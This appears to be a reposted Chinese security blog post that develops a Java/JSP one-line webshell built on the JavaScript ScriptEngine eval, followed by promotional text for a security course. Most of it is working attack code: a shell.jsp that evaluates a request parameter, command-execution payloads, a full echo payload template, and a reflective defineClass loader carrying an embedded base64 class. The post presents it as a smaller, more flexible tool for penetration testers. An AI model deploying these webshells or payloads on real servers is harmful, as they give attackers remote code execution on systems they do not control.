赞
踩
一直以来,Java一句话木马都是采用打入字节码defineClass实现的。这种方法的优势是可以完整的打进去一个类,可以几乎实现Java上的所有功能。不足之处就是Payload过于巨大,并且不像脚本语言一样方便修改。并且还存在很多特征,例如继承ClassLoader,反射调用defineClass等。本在这里提出一种Java一句话木马:利用Java中JS引擎实现的一句话木马。
1.Java没有eval函数,Js有eval函数,可以把字符串当代码解析。 2.Java从1.6开始自带ScriptEngineManager这个类,原生支持调用js,无需安装第三方库。 3.ScriptEngine支持在Js中调用Java的对象。
综上所述,我们可以利用Java调用JS引擎的eval,然后在Payload中反过来调用Java对象,这就是本文提出的新型Java一句话的核心原理。
ScriptEngineManager全名javax.script.ScriptEngineManager,从Java 6开始自带。其中Java 6/7采用的js解析引擎是Rhino,而从java8开始换成了Nashorn。不同解析引擎对同样的代码有一些差别,这点后面有所体现。
如果说原理其实一两句话就可以说清楚,但是难点在于Payload的编写。跨语言调用最大的一个难点就是数据类型以及方法的转换。例如Java中有byte数组,Js中没有怎么办?C++里有指针但是Java里没有这个玩意怎么办?
在实现期间踩了很多的坑,这篇文章跟大家一起掰扯掰扯,希望能给大家提供点帮助。
//通过脚本名称获取: ScriptEngine engine = new ScriptEngineManager().getEngineByName("JavaScript");//简写为js也可以 //通过文件扩展名获取: ScriptEngine engine = new ScriptEngineManager().getEngineByExtension("js");//通过MIME类型来获取: ScriptEngine engine = new ScriptEngineManager().getEngineByMimeType("text/javascript");
ScriptEngine engine = new ScriptEngineManager().getEngineByName("js"); engine.put("request", request); engine.put("response", response); engine.eval(request.getParameter("mr6"));
或者通过eval的重载函数,直接把对象通过一个HashMap放进去
new javax.script.ScriptEngineManager().getEngineByName("js").eval(request.getParameter("ant"), new javax.script.SimpleBindings(new java.util.HashMap() {{ put("response", response); put("request", request); }}))
综合上面两步,有很多种写法,例如:
shell.jsp
<% javax.script.ScriptEngine engine = new javax.script.ScriptEngineManager().getEngineByName("js"); engine.put("request", request); engine.put("response", response); engine.eval(request.getParameter("mr6")); %>
或者直接缩写成一句:
<% new javax.script.ScriptEngineManager().getEngineByName("js").eval(request.getParameter("mr6"), new javax.script.SimpleBindings(new java.util.HashMap() {{put("response", response);put("request", request);}})); %>
以执行命令为例:
POST:mr6=java.lang.Runtime.getRuntime().exec("calc");
即可达到命令执行的效果。
翻阅文档比较枯燥,这里挑一些用到的说一说。
感兴趣的同学也可以看一下原文档:原文档
前面加上全限定类名即可
var s = [3]; s[0] = "cmd"; s[1] = "/c"; s[2] = "whoami";//yzddmr6 var p = java.lang.Runtime.getRuntime().exec(s); var sc = new java.util.Scanner(p.getInputStream(),"GBK").useDelimiter("\\A"); var result = sc.hasNext() ? sc.next() : ""; sc.close();
var Vector = java.util.Vector; var JFrame = Packages.javax.swing.JFrame; //这种写法仅仅支持Nashorn,Rhino并不支持 var Vector = Java.type("java.util.Vector") var JFrame = Java.type("javax.swing.JFrame")
// Rhino var Array = java.lang.reflect.Array var intClass = java.lang.Integer.TYPE var array = Array.newInstance(intClass, 8) // Nashorn var IntArray = Java.type("int[]") var array = new IntArray(8)
默认情况下,Nashorn 不会导入Java的包。这样主要为了避免类型冲突,比如你写了一个new String,引擎怎么知道你new的是Java的String还是js的String?所以所有的Java的调用都需要加上全限定类名。但是这样写起来很不方便。
这个时候大聪明Mozilla Rhino 就想了一个办法,整了个扩展文件,里面提供了importClass 跟importPackage 方法,可以导入指定的Java包。
importClass 导入指定Java的类,现在推荐用Java.type
importPackage 导入一个Java包,类似import com.yzddmr6.*,现在推荐用JavaImporter
这里需要注意的是,Rhino对该语法的错误处理机制,当被访问的类存在时,Rhino加载该class,而当其不存在时,则把它当成package名称,而并不会报错。
load("nashorn:mozilla_compat.js"); importClass(java.util.HashSet); var set = new HashSet(); importPackage(java.util); var list = new ArrayList();
在一些特殊情况下,导入的全局包会影响js中的函数,例如类名冲突。这个时候可以用JavaImporter,并配合with语句,对导入的Java包设定一个使用范围。
// create JavaImporter with specific packages and classes to import var SwingGui = new JavaImporter(javax.swing,javax.swing.event,javax.swing.border,java.awt.event); with (SwingGui) {// 在with里面才可以调用swing里面的类,防止污染var mybutton = new JButton("test");var myframe = new JFrame("test"); }
方法在JavaScript中实际上是对象的一个属性,所以除了使用 . 来调用方法之外,也可以使用[]来调用方法:
var System = Java.type('java.lang.System'); System.out.println('Hello, World');// Hello, World System.out['println']('Hello, World'); // Hello, World
Java支持重载(Overload)方法,例如,System.out 的 println 有多个重载版本,如果你想指定特定的重载版本,可以使用[]指定参数类型。例如:
var System = Java.type('java.lang.System'); System.out['println'](3.14);// 3.14 System.out['println(double)'](3.14);// 3.14 System.out['println(int)'](3.14); // 3
详情写在注释里了
//导入基础拓展 try {load("nashorn:mozilla_compat.js"); } catch (e) {} //导入常见包 importPackage(Packages.java.util); importPackage(Packages.java.lang); importPackage(Packages.java.io); var output = new StringBuffer(""); //输出 var cs = "${jspencode}"; //设置字符集编码 var tag_s = "${tag_s}"; //开始符号 var tag_e = "${tag_e}"; //结束符号 try {response.setContentType("text/html");request.setCharacterEncoding(cs);response.setCharacterEncoding(cs);function decode(str) {//参数解码str = str.substr(2);var bt = Base64DecodeToByte(str);return new java.lang.String(bt, cs);}function Base64DecodeToByte(str) {importPackage(Packages.sun.misc);importPackage(Packages.java.util);var bt;try {bt = new BASE64Decoder().decodeBuffer(str);} catch (e) {bt = Base64.getDecoder().decode(str);}return bt;}function asoutput(str) {//回显加密return str;}function func(z1) {//eval functionreturn z1;}output.append(func(z1)); //添加功能函数回显 } catch (e) {output.append("ERROR:// " + e.toString()); //输出错误 } try {response.getWriter().print(tag_s + asoutput(output.toString()) + tag_e); //回显 } catch (e) {}
要注意的是,在遇到Java跟JS可能存在类型冲突的地方,即使导入了包也要加上全限定类名。
在编写payload的时候被坑了很久的一个问题就是,在导入java.lang以后写new String(bt,cs)没有加全限定类名,导致打印出来的一直是一个字符串地址。
正确的操作是new java.lang.String(bt,cs)。因为在Java和Js中均存在String类,按照优先级,直接new出来的会是Js的对象。
下面附上类型对比表:
JavaScript Value | JavaScript Type | Java Type | Is Scriptable | Is Function |
---|---|---|---|---|
{a:1, b:['x','y']} | object | org.mozilla.javascript.NativeObject | + | - |
[1,2,3] | object | org.mozilla.javascript.NativeArray | + | - |
1 | number | java.lang.Double | - | - |
1.2345 | number | java.lang.Double | - | - |
NaN | number | java.lang.Double | - | - |
Infinity | number | java.lang.Double | - | - |
-Infinity | number | java.lang.Double | - | - |
true | boolean | java.lang.Boolean | - | - |
"test" | string | java.lang.String | - | - |
null | object | null | - | - |
undefined | undefined | org.mozilla.javascript.Undefined | - | - |
function () { } | function | org.mozilla.javascript.gen.c1 | + | + |
/.*/ | object | org.mozilla.javascript.regexp.NativeRegExp | + | + |
这也是当时一个坑点,看下面一段代码
var readonlyenv = System.getenv();var cmdenv = new java.util.HashMap(readonlyenv);var envs = envstr.split("\\|\\|\\|asline\\|\\|\\|");for (var i = 0; i < envs.length; i++) {var es = envs[i].split("\\|\\|\\|askey\\|\\|\\|");if (es.length == 2) {cmdenv.put(es[0], es[1]);}}var e = [];var i = 0;print(cmdenv+'\n');for (var key in cmdenv) {//关键print("key: "+key+"\n");e[i] = key + "=" + cmdenv[key];i++;}
其中cmdenv是个HashMap,这段代码在Java 8中Nashorn引擎可以正常解析,var key in cmdenv的时候把cmdenv的键给输出了
但是在Java 6下运行时,Rhino把他当成了一个js对象,把其属性输出了
所以涉及到这种混合写法就会有异议,不同的引擎有不同的解释。
解决办法使用Java迭代器即可,不掺杂js的写法。
var i = 0;var iter = cmdenv.keySet().iterator();while (iter.hasNext()) {var key = iter.next();var val = cmdenv.get(key);//print("\nkey:" + key);//print("\nval:" + val);e[i] = key + "=" + val;i++;}
在Java中,如果涉及到不同版本之间类的包名不一样,我们通常不能直接导入,而要使用反射的写法。
例如base64解码的时候,Java的写法如下
public byte[] Base64DecodeToByte(String str) {byte[] bt = null;String version = System.getProperty("java.version");try {if (version.compareTo("1.9") >= 0) {Class clazz = Class.forName("java.util.Base64");Object decoder = clazz.getMethod("getDecoder").invoke(null);bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);} else {Class clazz = Class.forName("sun.misc.BASE64Decoder");bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);}return bt;} catch (Exception e) {return new byte[]{};}}
改写成js风格后,发现会有一些奇奇怪怪的BUG。(后来发现反射其实也可以实现,导入Java类型然后再传入反射参数即可,就是比较麻烦)
[<img src="https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/6e7937f3023c4457984616fc93a3406a~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](跳转提示-稀土掘金 "https://xzfile.aliyuncs.com/media/upload/picture/20210608115232-f45a64a8-c80c-1.png"" style="margin: auto" />
function test(str) {var bt = null;var version = System.getProperty("java.version");if (version.compareTo("1.9") >= 0) {var clazz = java.lang.Class.forName("java.util.Base64");var decoder = clazz.getMethod("getDecoder").invoke(null);bt = decoder.getClass().getMethod("decode", java.lang.String.class).invoke(decoder, str);} else {var clazz = java.lang.Class.forName("sun.misc.BASE64Decoder");bt = clazz.getMethod("decodeBuffer", java.lang.String.class).invoke(clazz.newInstance(), str);}return bt; }
但是在Js中,我们并不需要这么麻烦。上面提到过如果importPackage了一个不存在的包名,Js引擎会将这个错误给忽略,并且由于Js松散的语言特性,我们仅仅需要正射+异常捕获就可以完成目的。大大减小了payload编写的复杂度。
function Base64DecodeToByte(str) {importPackage(Packages.sun.misc);importPackage(Packages.java.util);var bt;try {bt = new BASE64Decoder().decodeBuffer(str);} catch (e) {bt = Base64.getDecoder().decode(str);}return bt;}
理论上,我们可以用js引擎的一句话实现所有字节码一句话的功能,退一万步讲,如果有些功能实在不好实现,或者说想套用现有的payload应该怎么办呢。
我们可以用java调用js后,再调用defineClass来实现:
编写一个命令执行的类:calc.java
import java.io.IOException; public class calc {public calc(String cmd){try {Runtime.getRuntime().exec(cmd);} catch (IOException e) {e.printStackTrace();}} }
编译之后base64一下
> base64 -w 0 calc.class yv66vgAAADQAKQoABwAZCgAaABsKABoAHAcAHQoABAAeBwAfBwAgAQAGPGluaXQ+AQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEAAWUBABVMamF2YS9pby9JT0V4Y2VwdGlvbjsBAAR0aGlzAQAGTGNhbGM7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQANU3RhY2tNYXBUYWJsZQcAHwcAIQcAHQEAClNvdXJjZUZpbGUBAAljYWxjLmphdmEMAAgAIgcAIwwAJAAlDAAmACcBABNqYXZhL2lvL0lPRXhjZXB0aW9uDAAoACIBAARjYWxjAQAQamF2YS9sYW5nL09iamVjdAEAEGphdmEvbGFuZy9TdHJpbmcBAAMoKVYBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQAPcHJpbnRTdGFja1RyYWNlACEABgAHAAAAAAABAAEACAAJAAEACgAAAIgAAgADAAAAFSq3AAG4AAIrtgADV6cACE0stgAFsQABAAQADAAPAAQAAwALAAAAGgAGAAAABAAEAAYADAAJAA8ABwAQAAgAFAAKAAwAAAAgAAMAEAAEAA0ADgACAAAAFQAPABAAAAAAABUAEQASAAEAEwAAABMAAv8ADwACBwAUBwAVAAEHABYEAAEAFwAAAAIA
填入下方payload
try {load("nashorn:mozilla_compat.js"); } catch (e) {} importPackage(Packages.java.util); importPackage(Packages.java.lang); importPackage(Packages.java.io); var output = new StringBuffer(""); var cs = "UTF-8"; response.setContentType("text/html"); request.setCharacterEncoding(cs); response.setCharacterEncoding(cs); function Base64DecodeToByte(str) {importPackage(Packages.sun.misc);importPackage(Packages.java.util);var bt;try {bt = new BASE64Decoder().decodeBuffer(str);} catch (e) {bt = new Base64().getDecoder().decode(str);}return bt; } function define(Classdata, cmd) {var classBytes = Base64DecodeToByte(Classdata);var byteArray = Java.type("byte[]");var int = Java.type("int");var defineClassMethod = java.lang.ClassLoader.class.getDeclaredMethod("defineClass",byteArray.class,int.class,int.class);defineClassMethod.setAccessible(true);var cc = defineClassMethod.invoke(Thread.currentThread().getContextClassLoader(),classBytes,0,classBytes.length);return cc.getConstructor(java.lang.String.class).newInstance(cmd); } output.append(define("yv66vgAAADQAKQoABwAZCgAaABsKABoAHAcAHQoABAAeBwAfBwAgAQAGPGluaXQ+AQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEAAWUBABVMamF2YS9pby9JT0V4Y2VwdGlvbjsBAAR0aGlzAQAGTGNhbGM7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQANU3RhY2tNYXBUYWJsZQcAHwcAIQcAHQEAClNvdXJjZUZpbGUBAAljYWxjLmphdmEMAAgAIgcAIwwAJAAlDAAmACcBABNqYXZhL2lvL0lPRXhjZXB0aW9uDAAoACIBAARjYWxjAQAQamF2YS9sYW5nL09iamVjdAEAEGphdmEvbGFuZy9TdHJpbmcBAAMoKVYBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQAPcHJpbnRTdGFja1RyYWNlACEABgAHAAAAAAABAAEACAAJAAEACgAAAIgAAgADAAAAFSq3AAG4AAIrtgADV6cACE0stgAFsQABAAQADAAPAAQAAwALAAAAGgAGAAAABAAEAAYADAAJAA8ABwAQAAgAFAAKAAwAAAAgAAMAEAAEAA0ADgACAAAAFQAPABAAAAAAABUAEQASAAEAEwAAABMAAv8ADwACBwAUBwAVAAEHABYEAAEAFwAAAAIAGA==","calc") ); response.getWriter().print(output);
成功弹出计算器
也就是说,新型一句话在特殊情况下,还可以继续兼容原有的字节码一句话,甚至复用原有的Payload。
测试环境:Java>=6
同样的列目录Payload,原有的字节码方式数据包长度为7378,而新型JSP一句话仅仅为2481,差不多为原有的三分之一。
列目录
中文测试
虚拟终端
数据库连接
题外话:安全是个不错的行业,我干的也挺好,如果你也想学习安全,学习的过程中有需要的学习文档,俺可以分享给大家!【查看全部文档】
基于JS引擎的Java一句话体积更小,变化种类更多,使用起来更灵活。范围为Java 6及以上,基本可以满足需求,但是Payload写起来非常麻烦,也不好调试,算是有利有弊。
提出新型一句话并不是说一定要取代原有的打入字节码的方式,只是在更复杂情况下,可以提供给渗透人员更多的选择。
其实入门网络安全要学的东西不算多,也就是网络基础+操作系统+中间件+数据库,四个流程下来就差不多了。
其中包括操作系统Windows基础和Linux基础,标记语言HTML基础和代码JS基础,以及网络基础、数据库基础和虚拟机使用等...
别被这些看上去很多的东西给吓到了,其实都是很简单的基础知识,同学们看完基本上都能掌握。计算机专业的同学都应该接触了解过,这部分可以直接略过。没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。 当然你也可以看下面这个视频教程仅展示部分截图: 学到http和https抓包后能读懂它在说什么就行。
web是对外开放的,自然成了的重点关照对象,有事没事就来入侵一波,你说不管能行吗! 想学好Web安全,咱首先得先弄清web是怎么搭建的,知道它的构造才能精准打击。所以web前端和web后端的知识多少要了解点,然后再学点python,起码得看懂部分代码吧。
最后网站开发知识多少也要了解点,不过别紧张,只是学习基础知识。
等你用几周的时间学完这些,基本上算是具备了入门合格渗透工程师的资格,记得上述的重点要重点关注哦! 再就是,要正式进入web安全领域,得学会web渗透,OWASP TOP 10等常见Web漏洞原理与利用方式需要掌握,像SQL注入/XSS跨站脚本攻击/Webshell木马编写/命令执行等。
这个过程并不枯燥,一边打怪刷级一边成长岂不美哉,每个攻击手段都能让你玩得不亦乐乎,而且总有更猥琐的方法等着你去实践。
学完web渗透还不算完,还得掌握相关系统层面漏洞,像ms17-010永恒之蓝等各种微软ms漏洞,所以要学习后渗透。可能到这里大家已经不知所云了,不过不要紧,等你学会了web渗透再来看会发现很简单。
其实学会了这几步,你就正式从新手小白晋升为入门学员了,真的不算难,你上你也行。
不过我们这个水平也就算个渗透测试工程师,也就只能做个基础的安全服务,而这个领域还有很多业务,像攻防演练、等保测评、风险评估等,我们的能力根本不够看。
所以想要成为一名合格的网络工程师,想要拿到安全公司的offer,还得再掌握更多的网络安全知识,能力再更上一层楼才行。即便以后进入企业,也需要学习很多新知识,不充实自己的技能就会被淘汰。
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
因为入门学习阶段知识点比较杂,所以我讲得比较笼统,最后联合CSDN整理了一套【282G】网络安全从入门到精通资料包,需要的小伙伴可以点击链接领取哦!
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。